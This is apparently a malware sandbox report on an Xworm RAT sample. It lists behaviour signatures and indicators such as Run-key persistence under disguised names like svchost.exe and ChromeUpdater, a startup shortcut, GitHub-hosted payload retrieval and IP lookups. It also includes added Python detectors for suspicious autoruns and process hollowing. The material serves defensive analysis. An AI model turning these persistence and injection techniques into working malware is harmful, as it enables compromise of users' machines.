Analysis Overview
Threat Level: Known bad
The file https://moonreborn.com/attachments/steal_31.03.24_v2.20.zip was found to be: Known bad.
Malicious Activity Summary
Note: the signatures below fire on several processes in the detonation, including benign ones (explorer.exe, chrome.exe, msedge.exe, AcroRd32.exe); check the Process column of each signature table before attributing an entry to the sample.
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Modifies Installed Components in the registry
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
Reads user/profile data of web browsers
Drops startup file
Executes dropped EXE
Enumerates connected drives
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Suspicious use of SetThreadContext
Drops file in System32 directory
Enumerates physical storage devices
Modifies registry key
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Modifies Internet Explorer settings
Uses Volume Shadow Copy service COM API
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Enumerates processes with tasklist
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy WMI provider
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Creates scheduled task(s)
Kills process with taskkill
Modifies data under HKEY_USERS
NTFS ADS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Task Scheduler COM API
Modifies registry class
Delays execution with timeout.exe
Suspicious behavior: GetForegroundWindowSpam
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-11 13:31
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-11 13:31
Reported
2024-04-11 13:58
Platform
win11-20240214-en
Max time kernel
1588s
Max time network
1590s
Command Line
Signatures
Detect Xworm Payload
(no indicator details recorded for this signature)
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
(8 identical events; the requesting process is the 32-bit powershell.exe under SysWOW64)
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
(no indicator details recorded for this signature)
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" | C:\Users\Admin\Pictures\b3ownddosser.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLogger\\Update.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
(the b3ownddosser value was written 5 times; identical rows collapsed)
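The three Run values above show the patterns an analyst hunts for on a real host: a payload persisting from a user-writable folder (Pictures, AppData\Roaming), a value named after a legitimate updater, a system binary name (svchost.exe) outside C:\Windows, and a value written by reg.exe rather than by the payload itself. The following is an added example, not code from the report or the sandbox vendor; it parses rows in the report's pipe-delimited layout (the three rows are copied from the table above as constructed input) and scores each autorun entry. The folder and binary-name lists are assumptions chosen for illustration.

```python
import ntpath
from dataclasses import dataclass, field

# Constructed input: the three distinct rows from the "Adds Run key to start
# application" table, in the report's own pipe-delimited layout.
SAMPLE_ROWS = r"""
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" | C:\Users\Admin\Pictures\b3ownddosser.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLogger\\Update.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
"""

RUN_KEY = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"

# Assumed list of folders an unprivileged user can write to; an autorun
# pointing there is the "persist from the drop location" pattern.
USER_WRITABLE = ("\\appdata\\", "\\pictures\\", "\\downloads\\", "\\desktop\\",
                 "\\documents\\", "\\temp\\", "\\public\\")

# Assumed list of Windows binary names that only legitimately live under C:\Windows.
SYSTEM_NAMES = {"svchost.exe", "explorer.exe", "lsass.exe", "csrss.exe",
                "winlogon.exe", "services.exe", "dllhost.exe", "rundll32.exe"}


@dataclass
class RunEntry:
    hive: str          # HKU\<SID> or HKLM, normalised from the \REGISTRY\... form
    value_name: str    # value under ...\CurrentVersion\Run
    image_path: str    # unescaped path the value points to
    setter: str        # process that wrote the value
    reasons: list = field(default_factory=list)


def parse_run_rows(text):
    """Parse 'Set value' rows of a sandbox registry table into RunEntry objects."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("| Set value"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        _desc, indicator, setter, _target = cells[:4]
        key, _, data = indicator.partition(" = ")
        idx = key.lower().find(RUN_KEY.lower())
        if idx < 0:
            continue  # not a Run key; other autostart locations are out of scope here
        hive_raw = key[:idx]
        hive = hive_raw.upper()
        if hive.startswith("\\REGISTRY\\USER\\"):
            hive = "HKU\\" + hive_raw[len("\\REGISTRY\\USER\\"):]
        elif hive == "\\REGISTRY\\MACHINE":
            hive = "HKLM"
        image = data.strip('"').replace("\\\\", "\\")  # the report escapes backslashes
        entries.append(RunEntry(hive, key[idx + len(RUN_KEY):], image, setter))
    return entries


def assess(entry):
    """Return the reasons an autorun entry deserves a closer look (empty list if none)."""
    path = entry.image_path.lower()
    reasons = []
    if any(seg in path for seg in USER_WRITABLE):
        reasons.append("image in user-writable path")
    if ntpath.basename(path) in SYSTEM_NAMES and not path.startswith("c:\\windows\\"):
        reasons.append("system binary name outside Windows directory")
    if "update" in entry.value_name.lower() and "program files" not in path:
        reasons.append("update-like name outside Program Files")
    if ntpath.basename(entry.setter).lower() == "reg.exe":
        reasons.append("written via reg.exe")
    return reasons


def triage(text):
    """Parse and score every Run entry in a table excerpt."""
    entries = parse_run_rows(text)
    for e in entries:
        e.reasons = assess(e)
    return entries


if __name__ == "__main__":
    for e in triage(SAMPLE_ROWS):
        flag = "SUSPICIOUS" if e.reasons else "ok"
        print(f"{flag:10} {e.hive}\\...\\Run\\{e.value_name} -> {e.image_path}  [{'; '.join(e.reasons)}]")
```

The same entries can be checked on a live host by reading HKCU\Software\Microsoft\Windows\CurrentVersion\Run for the affected user and feeding the value name and data through assess(); the setter check only applies when process telemetry (as in the sandbox) is available.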
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
(raw.githubusercontent.com: 11 events; camo.githubusercontent.com: 1 event; identical rows collapsed)
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
(3 identical events)
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\perfc009.dat | C:\Windows\system32\lodctr.exe | N/A |
| File created | C:\Windows\system32\perfh009.dat | C:\Windows\system32\lodctr.exe | N/A |
Suspicious use of SetThreadContext
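The report lists "Suspicious use of SetThreadContext" and "Suspicious use of WriteProcessMemory" as separate signatures with no call details. On their own each API has benign users (debuggers, crash handlers); the signal is the ordered chain create process (suspended), write into it, SetThreadContext, ResumeThread, which is process hollowing. The following is an added example, not code from the report or the sandbox vendor, that correlates such a chain over a per-process API trace; the trace, its PIDs and the second, benign-looking pair are constructed for illustration, and the generalisation to the full chain goes beyond what the report itself shows.

```python
from collections import defaultdict

# Constructed API-call trace (not from the report) in the shape a sandbox emits
# per process: (caller_pid, api, target_pid, flags). PIDs are made up.
TRACE = [
    (4120, "CreateProcessW",       5232, "CREATE_SUSPENDED"),
    (4120, "NtUnmapViewOfSection", 5232, ""),
    (4120, "VirtualAllocEx",       5232, "PAGE_EXECUTE_READWRITE"),
    (4120, "WriteProcessMemory",   5232, ""),
    (4120, "SetThreadContext",     5232, ""),
    (4120, "ResumeThread",         5232, ""),
    # A second pair that writes memory but never redirects a thread: not hollowing.
    (6008, "CreateProcessW",       6100, ""),
    (6008, "WriteProcessMemory",   6100, ""),
    (6008, "ResumeThread",         6100, ""),
]

# Process-creation APIs folded into one abstract step so the chain matches
# whichever entry point the sample used.
CREATE_APIS = {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW", "NtCreateUserProcess"}

# The ordered core of process hollowing: spawn, overwrite, redirect entry point, run.
CHAIN = ("<create>", "WriteProcessMemory", "SetThreadContext", "ResumeThread")


def _in_order(chain, apis):
    """True when every step of chain appears in apis in that order (gaps allowed)."""
    it = iter(apis)
    return all(any(a == step for a in it) for step in chain)


def find_hollowing(trace):
    """Return [(caller_pid, target_pid, created_suspended)] for caller/target pairs
    whose API sequence contains the hollowing chain in order."""
    by_pair = defaultdict(list)
    suspended = {}
    for caller, api, target, flags in trace:
        if api in CREATE_APIS:
            api = "<create>"
            suspended[(caller, target)] = "CREATE_SUSPENDED" in flags
        by_pair[(caller, target)].append(api)
    hits = []
    for pair, apis in by_pair.items():
        if _in_order(CHAIN, apis):
            hits.append((pair[0], pair[1], suspended.get(pair, False)))
    return hits


def score(hits):
    """A suspended spawn ahead of the write/context/resume chain is the strongest
    form; the same chain on a normally started process is still worth a look."""
    return [(c, t, "high" if s else "medium") for c, t, s in hits]


if __name__ == "__main__":
    for caller, target, level in score(find_hollowing(TRACE)):
        print(f"{level}: pid {caller} hollowed pid {target}")
```

Only the caller/target pairing and the order of the four steps are used, so the check survives a sample that interleaves unrelated calls (as the NtUnmapViewOfSection and VirtualAllocEx calls do above); a trace where the target is written but no thread context is changed, as in the second pair, does not match.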
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
(4 identical events)
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
(4 identical events)
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
(10 identical events)
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" | C:\Windows\explorer.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133573161416536741" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f80cb859f6720028040b29b5540cc05aab60000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
